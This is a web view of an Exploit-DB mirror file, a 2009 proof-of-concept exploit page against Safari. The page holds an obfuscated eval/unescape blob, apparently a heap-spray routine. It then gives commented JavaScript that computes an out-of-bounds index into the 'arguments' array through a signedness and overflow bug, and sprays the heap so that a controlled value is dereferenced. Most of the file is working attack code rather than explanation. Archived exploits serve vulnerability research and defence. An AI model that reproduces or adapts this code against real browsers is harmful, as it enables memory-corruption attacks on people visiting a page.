bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/7673.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

137 lines
No EOL
34 KiB
HTML
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<BODY>
<CODE id="sploit status"></CODE>
<CODE id="heapspray status"></CODE>
<SCRIPT>
i=0;eval(unescape(("gÃ#MÃÃÃg#ÉÄÊÅ@ÅÑÅÅÅØÅÉÅÊÆ@gÃÃœ@ÜÑÜÂÜ#ÜÄÜÅÜÆÜgÜØÜÉÜÊÜÃÜÜÜMÃœNÜßM@MÃM#MÄMÃ…MÆMgMØMÉMÊMÃMÃœMMMNMßN@NÃN#NÄNÃ…NÆNgNØNÉNÊNÃNÃœNMNNNßß@ßÑßÂß#ßÄßÅßÆßgßØßÉßÊßÃßÜßMßNßßÃÃ#ËÆÄ#MÃÃgÄgÉg@ÆÅÆßÆÆÃØNgÃÉ#MßÄNg#MNؘ#MÆÆÕÅÃ@M#ÅßßßgÄÃÜÆÅN#MÃÃÃÆÕÃÉÆÅ#MãÃÃÃgÄÃÉgÄ#M#Á#Ð#\
Ãg #\
#M NgÃNÆ#ÆQÆ Ãœ\
ÆÜ ÃØgÄßÅÃÃœgÄÃÉ#Ãg#N @\
#Ãœ ÆÅÃÉg##MÆNÆÕggÃ@ÄÃÆÃgÉ Â\
ØÆ Ã…ÃMg#N@ÂË#ÃÃÉÃNÆÊÆßMÊÃØÅÜÃÃ#@Ãœ Æ\
ÂË g##ÃNMgÄgÃ…gÃÆ NÃ@g##ÃgM#ÃÆgÆÜ Ã…@#MgÃÃ…ÃœÃà ÄMÃ…#Ä É\
ÄÅ Â@#gÄ@ÄNÅÄÃ@#Ã…ÃN#ÃßÆNÃ#Áß g#ÑÜ#Ãœ#gMMÅÄ MÃ…#ÄÉÄÅ Â@#gÄ@ÄNÃ… Ä\
Â@ #ÆÃN#ÐßÆNÃ#Æßg##Ãœ#Ãœ#gMNN#Ã…ÃN#ÑÄÊ NN#ÆÃN#ÐÄÊg M#ËÆÆÅ ÅÂÐ ßØ#ÃÃØgÄÃÜÆÅ Â\
Ãœg #N#MÆãMgÄ#ßgÄ#ÊNÃÄÄ#@ÄÄ#@ÄÄ#@ÄÄÜËÆÑßÉ g##Mg##ßg## ÊgÃgMÃœ ËßÊ#MÆ ÅãßÆÅ#ÊÅÜÂÂÅÜÅÜ #\
@Ã… ÃœÃÃÃœÃÃœg#MNÃ#ÆÜ#Ãœ#ÜËÅØ#MNÃ#ÁÜ#Ãœ##ËÅÊ#MNÃã@ #ÑÜ##Ð#ÐÜË Mg#MÆ ÆæÃÆÜg#ÆÅÜ ËÆÉÅÉÜÂ#M# И#Â#Ð Ãœ\
ËÆ ÉÅÑÜÂ#M#ÄÜÃÆÉÅÃNßÅ#ÆÉgÊÆÅ#MãÃÃœÃ#MÆNgÅÆÜÆÜÜ Ãg#ÄÜÆßÆg#M ÅÜÂÂÅ ÃœÃÃÃœÃg#Ã…#MØ #MÃ…ÃœÃÃÃ… Ãœ\
 ÜÃMÃœ#MÆNgÅÆÜÆÜ#ËÆÉÜÜ ÂØÄ#ÆØÆßÆMÆÅMÐgÜßà ÃØÄÆÆÉNMÆÆÆ ßgØM@ gÜßÃÃØ Ä\
MÃ… #ÄÉÄÅÂ@ÅÜÅÜÆÄÂË ÉßÃgÜßÃÅÆÜÊg#ÆÉÆ ßÆNÃØM@ÂØÅ#Æ ÁÆÆæ ÃÆÉ Â\
Éß ÃgÜßÃÃØÄßg@ÜÊÆ ÐgÜßÃÃßMÃ…ÃÄ#Ñ ÂÄ#ÂÂÄ#ãÂÄ#ÅÂÄ# ÄÂÄ#Æ ÜÆ#Ãg Â\
ÜÜ ÅÜÅÜÃØßÃÃ…gMÊÆ ÄÆßggg#Â@ÂØÅËÅ N#ÃÃ…MÃÊÃÉßÃÃßMÃ…ÃÄ#ÑÜÆ #ÃÆN# MÆÉÜN Ä\
@ß @gÃ#ËÅ@#MÆgÆ ÜÅ@Ã…ÃÆNÃ…M#ÃÃ… @ÃÉÆÆÆßgÃÃØg#NÄà @MÊà @Ã…@ÃÉg ÄßÅÅ Ë\
g# NÄÅM#MÃ…@Ã…Ãg#N ÄÅMgÃÆßÃÜÆÃN#M MãMÆNÆÅggÃ@Ä ÆÅÅ ØÅÜÃÃÃœMà NÆÆÄ Æ\
Ã…Ã… ÃNÆãÆÃÆÜÆÜÃØ ÃœMÃNÆßÅÄßÅÃÉÜÆ#ÃMMÃNÆßÅ ÄßÅ#MgÄßÅ #ÃMMà NÆÆÄÆÅÅã MÆß# Ë\
g# ÆÅgÄÅÄÆÉÆMÆÅ ÆßgÃ…gÄÃØMMÃÜÆÃMNN ÉÆÜÆßÆ gMÃÆ ßN#Â#g #ÄÜ Æ\
ßÆ gÃÃ#MÃ#g#Ã…#M ØNÉg#MØÃØÆßM NNÉg #MØM ÃÆßN# Â#g# Ã…\
#M Ø#MÆßMßÅÜÅÜg ÄÃßÆgMÃ…NÃ… N Ã…NÃ…N ÅÜÆMß#ÃœÃßÆgMÃ… ÂÆÆÜ g\
Ä# ÃÜÆÜN#ÜÄÂÅÂ# NÃ…ÃœÃÃ#Ë MÃà #MÃà ÉÂ# Mà ÃNMÊÆNÜÊÄØÅÄÄMÄÜ#Mà #g# Ä\
ÜÆ ßÆgÃÃÃ#g#Ã…#M Ø#ÃgM NÉg#gÄ gÃMÊ ÆgÄÆÆÉ ÆÜÆÜMÃÆßÃÜÆÃN #ÆÈ#MNÃÆ ãÆÅ Æ\
ÉÆ ÃœÃØÆÃÃßÆßN@ É#ËÆ Ä#MÃ…ÃœÃÃÃ…Ãœ  Â#ËÆ Ãœ#MNÃÆ#ÆÕ ÆÉÆÜÃØÆÜÆß ÆgÃØÆØ ÂË#ÑÂÉ ÃßNà Æ\
ÜÆ ßÆgÃØ#ÂÂÉÂÉ# ËÆ ÆÆßgÃÃØÆg#M ÆÜ#ËÆ g#N# M#Ð#ÃÆgÃM N#ÆÄÂË#M ÆÄ#à ÆØÃÆNÃg@ÆßggÃØ #ÂÂÜ Æ\
ÉÂÉÆÄÂË#MÆß# ÃgMNMgÄgÃ…gÃÆNà @ÆÄÜØ#@ ÂÜÆÑ MNÃœÃg#Ãœ ÄMÃÆßN# Â#MÃœ# MÆß#ËÜ ÑÅ#ÜÄMÊÆ gÃ@Æ Æ\
ÆßÆMÃ@ÜÅÂ#Ãœg #ÉÜNÃ@gÄÆßÃ@ÜÅM Æ#ÉÜNÃNÜÆ #ËÜÑ ÅÜÅÜgÄ ÄÃg#g# gÅÆMM ÊÆgà @ÆÑÆÄÆÄ NMg #\
g# Â@gÆÆÁÆÉß ÜÆÉÆßÆNg#Â@Æß ÆÆÂÐ gÃ…g@Â@gÄÆ ßÂ@Ãœ ÅÂ#ÅØ# ÉßÑÂ@Æ ãÆÃgÃ… g#Æ ÅÆÄÂÐÆ gÉà @\
ÆÆ gÃÆÃÆgÆMÆ ÅÆNgÄßÜÆÉÆßÆ NßÃg@N Mg@ÆÃNMß ØÂÜ# ÃMNNÉ g@NMg@ ÆÃNM ßØ N#Æß#M Â#Ã… ß\
Åß g#gÄgÃMÊ ÆgÄÆÆÉÆÜÆÜà ØÂ#ßÊÂÜ MÉà É#ÃÆÆÆßg ÂÂØÆ ÃÃÐMÊà @Â#ÆQß Ég#N #ÆØ #MÆ NÆÕggà @M#ÂØÆ ÑÂÉ #\
ÃM ÂÆØÂÅ#Â# MãM#ÃÃÉgÄÆØÆßgg Â@ÆNÆ Ã…ggÃ@ÄÅ gà ÆßgÃà ØÅÜ ÄßÆÆ Ææg#Æ Ã…gÄ g#Â@Æß ÆÆÂÐÆãÆ@g#Â@ÆM g\
Ã…g #gÄÃ@ÆÂÆ Ã…ÃÐÆÅgÆÆÅ ÆNÃÐÃØ ÆÆÆßgÅÆ NÆÄÃ@ß @ÆØ# ÉÂËÜÆ ÜÆ#ËÆÆ æßgà ÂØÆÄÂ@ MÊÃ@g# Ã…ÃÆÃÃ…MN #ßÉ#Mg# Ã…\
ËÆ ÃÃ…MÃ…ÃÆÄ Ã…M#ËÜÑÅÜÅ ÃœgÄÄÉ ÆNg#ÜÊgÄ ÆÅÆÄß Mg#ÜÄ Â@Æ# ÆÐÂ@ß ÜÂ@Æ ßÆÆÆæg#ÆÅgÄà @ÜÅÆØÃNß ß#Ñã ÆÂÜ#Ä É\
ÃœN #ÊÂ@ß@ ÆÄÜNÃNÜÆ# ËÆß#M ÆßÜØ#@ÂÜ ØÆØ#N #N#Ñ ÉÂÉÂË ßÉÂËÆ ßÜØ ØÆØ #N#N#ÃÃÉÃÃßÉN@ÂÉ #à ÆßN@ #NM É\
N# ÆÉÄÅgØ Æ#ÆÕg#g# #MÆßN @ÃMMÉ#ËÆß #MÆßÜ ØMÉà ÉÂËÆ ßÜØÆÉ ÄÅg ØÆ#Æ Õg#g#ÂÜ MÉM NgMg M\
NÆ #ÆãÄÄË @ÆÂß#ÆËß@ÂØÂ#ÆÁ ßÉg##ßÅÜ ÂÂ@g gÆÉg ÄÆØ @MÊg# ÜÊg ÄÆÅ ÆÄ Â@Æã Æ@g# M\
ÄÅ ÃœÃÃÜÆÜNà NÜÆÜÃg#ÜÉ#MÆßÜ ÃÆÃg#ÅÉ#M Ã…ÃÃ…M ÜËÆÉÜ Ég# #Mã@ ÜËÜ ß#M# ÐÜË ÆÉ g#Mà #\
Ãœg gà ÂØÂ#ÅßÅßÆ #NMßÜÆÅßØÅÃÃÃœ#Ñ MNNÉÆ#NMß ÜÆÅß ØÅà N# Mà Â#g #ÜÉN @#ÜÅ ÊÂß #ÃN# #\
g# ÜÉÂË#M Â#g#ÜÉgÃà ØÜMÃÃœ#ÃMNÆÅÆÜg#ÆÅ gÃNÆÜÅÅÊ #Éß ÑÂ@Æ Âß# ÆËÂ@Æ Ææßgà ßMg #ÜÄMÊ Æ\
gß Ãg#ÜÄÅÉÂÜ# ÃMNgMNÉg#Ãœ ÄÅÉMÃN #MÃÃ#Mg #ßßNÃg#N#MMÆ ÃãÅ Ø#Ê ßNÃg#Ãœ#M MÆÃÃÃ#ÅØ N#N Ê#MÃØ ß\
NÃ… ÉÜÃÃÃßNÃ…ÃÃœÃÃÉÃß #Â#ÃÆÉN᎚ Ãœ@#MÃØß NÃ…ÃNßÅ #ÆÉgÊÆÅ ÂÉÂß# Â#Ãg# Ãg# MÃ#Mg#ßNÃÃ#ÅØ É#É# ÊNÃÃÃà #\
ÅØ ÂÉ#ÉÜÃÆÃg#ÅÉÅÃg#ÃgÃ…M #Mg#ÃÃÃ# g#ÜÉÜØ NÊÃÃg# ÃgN@ ÂÜÅÊ ß#ÃÃØNÊÃÃÆÉNßÄÜÜ@ÃÉÃMg#Ãg N@ ÉÜÃÆÉÜÉg#ÂËÂËÜ ËÜß Ë#MÅÊ Ãœ\
ËÆ ÉÃÃ#MÃ#Mg#ßÃM ÅÊ#ÊÅÊNÉg# MØÃØÅÜ ÃÃÅÜÅÜg ÄÄÑ ÆÜß#ß ÜÆÅÆÄÂ@ß@ßNÜÉg#ÃœNßMÆÃß#ÆÃg#Â@ÂØß@Â#ÜßÃNßßà ÉßÑ ÂÉÂ@gÄÆßÃ@g #ÜÄ @gNÜÅà #\
Ãœg #ÉÜNÃMÜÅÃØßNÃÃÃ#ÅØÂÉ#É ÃœNßÃg #ÜÄÅÉÂÜ# ÃMN ÆÅÆÜg#ÆÅgÃÃœÃÄ#ÆßÆÜÆÜÆÅ ÆãgÄMÊÆgÃ@ÆgÆ à ÆÃÆÁÆgÆÅ Ãœ Æ#à gÄgÉg@ Æ\
ÅÆ ᒒÃØNÃœÃÉÃÃß ÄNÃœÃØÃÉ#à ggMÊÆ ÄÆßggÃNÆ gÆ# ÃÉggMÊÆÄÆßggÃNÆg Æ#ÂØÂÉ#ËÜ ÑÅÉÂ@g#ÜÄ @ÆÄ Æ ßÆNÆÅà NÜÆÜÃMÃœ Â\
ØÆ ßßØMN#ÃgMgMà #gÄßÅÃgÄà ÆÄÆÄN Mg#g##ÉÃN ßß# ÑãÆÂÜ#ØÂÉÄÊß Æ#И#gÄÆßg#ÑÜ#Ãœ #MÃ…MgMÄ gÄ gÃgÅÆÅM ÅÆÉÅÉÜ M\
Ä# @MÅÆÉÅÃÃœÃMÄ# @gMÃ…@ÆÜÅ#gÉg #gÄÆ ÅÆMÅãg@ÆÅÆ ãÆÉ ÆÆÆÉÆãNÄg #Ã…ÃÅãgÄgÃMÊÆgÃ…Ã…gÅÆNÆ #gÄ ÆÉÆßÆNÃ… ØÆÉ ÅÆÆÁÆÉÆÃÆ NÆãÆÅÅÉÄ Ø\
ÆÅ ÆÁg@ÅÊßNÄÃß# ÆËÅ#ÆÉgÊÆÅÆ ÐÆßÆM g@ÆßÆNÆÅÆN gÄgà ÜÃg#ÆÅ gÄÅÄÆÉÆMÆÅÆßgÃ…gÄÜ@ÆÅÆNÆ ggÄ ÆØÜÑÂ#Åß ÅßÆÜÆ ßÆgÃØÅÜÃÃÃœÃÄØÆÅÆÁÆÄÜÊ Ã…\
#Æ ÉgÊÆÅÜ##Ð#Ð# ÐÜÄg@gÃÆÃgÉ ÜÅ#@ gØß@ÜÆÅÜÂÂÂÉ ÃœgÆÉ Ã…#g ÄÆà gÄÃgÜØÃNg#gÅÆ Ãg#g ÄgÃÃØÜÉÅÉÄ Âß#ÆËÜÊÆ Ã…gÃÃœÃ#ËÂ#ÜÜ#MÆNÆÁgÆ Æ\
ÉÆ gßÜÆßgÃÃNgÃ…g# ÜÊÄÃÆgÆÅÆNgÄ Mßßà ÜMÆÃÆggÅÆMÆÅÆNg Äg# NÆ#ÆQ ÆÜÆÜÆÅÆÅÜNÃà ÅÜ ÜßÆÉÄÃgÉgÄÆÅg#ÄÑÆÜß#ᚒ ÅÆÄM@ÅÜÅÜÂßÅÜÅÜ Æ\
Ä ÃÃÉßÃÆßÄßgÃ…gÄ g@gÃ…gÄÄÅÆÜÆÅ ÆMÆÕ ÆNgÄMÃÆÉÆÆÃØ M#ÄN gÅÆMÆ ÃÜÊMÄÅÜÃÃ#ÊMÃ… ÃÜÅÜÃÃM ÆßNÅÄÆÃÆgÆÅgÄÃgMg ÆÃÃ…ÃÆÅgÆ Ãœ\
Êg #ÆÅMØgÄßÜgÃ…g#MÉ#@gØ# ÑÜ##ÐÂß#ÃMÊÆÉÆNMà #MÆÆ ÕÅÃØMÜÆ ÆÄÄÆß ÆNÆ ÅÄØÆÃÆNÆÄÆÜÜÊMMÆÆÅggÃÆ Ãg@g@ÜÊMNÃÉ#ÃgM M\
ß NNMg@ÆÜÆÃÆãÆÅÃØÃßN@ÃNÆÜÜ@NИ#@NÃÄMß ÜÆØ ÃN N#ÂÉ gÃNÄÅ#ÆÅgÄgÄMÊÆgNÅà ÆÆNÆÃg#g@#Ë N\
ÆÜ ÃÅÜÅÜgÄÄ#NMßÜÆÅÆÄÃ@ÆßÆNÆÅ Â@Ng M#Åß ÆßÆÜÆÄÅÄÆßÅØ M#ÃNg@gÃÆ ß\
gÄ ÆßgÄgÉg@ÆÅÃN gÄÆ ßÅÃNÉ ÃœÃÅßÅßN ÊÆÉÄØ Æ\
ÅÆ ÁÆÄÜÊ ÄÜÜ @\
ÅÜÂÂÜ Å ß\
g#ÉÜNg N\
ÜÅ ÃØßNÃg N\
ÜÄ #ÆßÆÜÆ Ü\
ÆÅ ÆãgÄÄgÆ Ñ\
ÆÃÆÁÆgÆÅ N\
Mg ÃÆÅNNMÃ…Ã…# Æ\
ÁÆ ÆæÃÆÉÃß## Ä\
@Ä NÅÄÃ@NßÄÆÆß ÆßgÄÜÊß@ÅÜ Â\
Ëß ÃÃœNÃ@ÆÃgÉgÄÆÅg#ßÃÃNÜÆg ÑÂØÂ#ÅßÅßß#ÆÜÆßÆ #\
ßÄ #MÃ…ÃœÃÃgÅÆ NÆÄÆÅÆÆmÊÆÅÆÄÜÆßÅÆØÆÉg#ßÆMÄgÃÃ…ÃœÃÃÃœgMÄßg Ãœ\
#Ãœ #MÃ…Ã… ØMÄNÃßØÅÉÅ#ÜÄßÉg#Ä#ÆÐßÊg#ÄÂÆÑÆã Æ\
ËÆ gg ÃÆßgÅÆNÆÄßÃÃÊßÜÆÃgÄßM Â\
@Æ Ø ÆÅÆÁg@Â@ßNÃ#ÆÉß ß\
gÄ Æ\
ßÅÑÂØÂÂ#ÃÆÆÆßgÃÃØÆ#ãM#g#ÆãËÆ#ÃMãÃÆÄ#MÃØgÄ#MÆÄÃNg#g@ÆÜÆÉgÄÃØÃNÆ#ÆÈÆÁÄÃgÄÃØÆ#ÃÉÃÉÃÉÃNÆÊÆßÆÉÆNÃØgÄÃNg@Æßg@ÂØÂÉÂÉÂÉ#ÃÆÅgÆÆÁÆÜÃØÆÄÃÉ#ÃÃßÃßÃMÆ#ÂÄ#Ë#ãÅÊ#Ñ").replace(/./g,function(c){return" `'^*\\/|-_.swdibYPW,".indexOf(c)<0?(i++%2?'':'%')+(c.charCodeAt()&15).toString(16):''})))
// The index for the "arguments" array in a JavaScript function in
// Safari suffers from a signedness issue that allows access to elements
// that are out of bounds. The index is cast to a signed value before it
// is compared to the length of the array to check if it within the
// bounds. Integer values larger than 0x8000,0000 will be cast to a
// negative value and because they are always smaller then the length,
// they are treated as a valid index.
// The index into the arguments array ends up in instructions
// that multiply it by 4 to access data in an array of 32 bit values.
// There are no checks for overflows in this calculation. This allows us
// to cause it to access anything in memory:
// Pointer to object = base address + 4 * index
// The base address varies only slightly and is normally about
// 0x7FEx,xxxx. If we create a heap chunk of 0x0100,0000 bytes at a
// predictable location using heap spraying, we can then calculate an
// index that will access this memory.
var iBase = 0x7fe91e6c; // Random sample - value varies but not a lot.
var iTargetArea = 0x10000000;
// Be advised that heap spraying is "upside down" in Safari: strings
// are allocated at high addresses first and as the heap grows, the
// addresses go down. The heap will therefor grow in between a lot of
// DLLs which reside in this area of the address space as well.
// We'll need to find an area of memory to spray that is not likely to
// contain a DLL and easy to reach.
var iTargetAddress = 0x55555555;
// iTargetAddress(~0x5555,5555) = iBase(~0x7FEx,xxxx) + 4 * iIndex
// 4 * iIndex = (iTargetAddress - iBase) (optionally + 0x1,0000,0000 because an integer overflow is needed)
var iRequiredMultiplicationResult = iTargetAddress - iBase + (iTargetAddress < iBase ? 0x100000000 : 0)
// iIndex = (iTargetAddress - iBase) / 4
var iIndex = Math.floor(iRequiredMultiplicationResult / 4)
// We need to trigger the signedness issue so the index must be larger
// then 0x8000,0000. Because of the integer overflow in the
// multiplication, we can safely add 0x4000,0000 as often as we want;
// the multiplication will remove it from the result.
while (iIndex < 0x80000000) iIndex += 0x40000000
document.getElementById("sploit status").innerHTML = (
"iBase + 4 * iIndex = " +
"0x" + iBase.toString(16, 8) + " + 4 * " + iIndex.toString(16, 8) + " = " +
"0x" + (iBase + 4 * iIndex).toString(16, 8) + "<BR>"
);
// Set up heap spray
var oHeapSpray = new HeapSpray2(iTargetAddress, DWORD(0xDEADBEEF))
oHeapSpray.oOutputElement = document.getElementById("heapspray status")
// Spray heap asynchronously and call sploit when done.
oHeapSpray.spray(sploit)
function sploit(oHeapSpray) {
// This will cause an access violation using the value 0xDEADBEEF,
// which comes from the strings we sprayed the heap with.
// 6aa3d57f 8b4f0c mov ecx,dword ptr [edi+0Ch] ds:0023:deadbefb=????????
arguments[iIndex];
}
function DWORD(iValue) {
return String.fromCharCode(iValue & 0xFFFF, iValue >> 16)
}
</SCRIPT>
</BODY>
# milw0rm.com [2009-01-05]
Reference in a new issue View git blame Copy permalink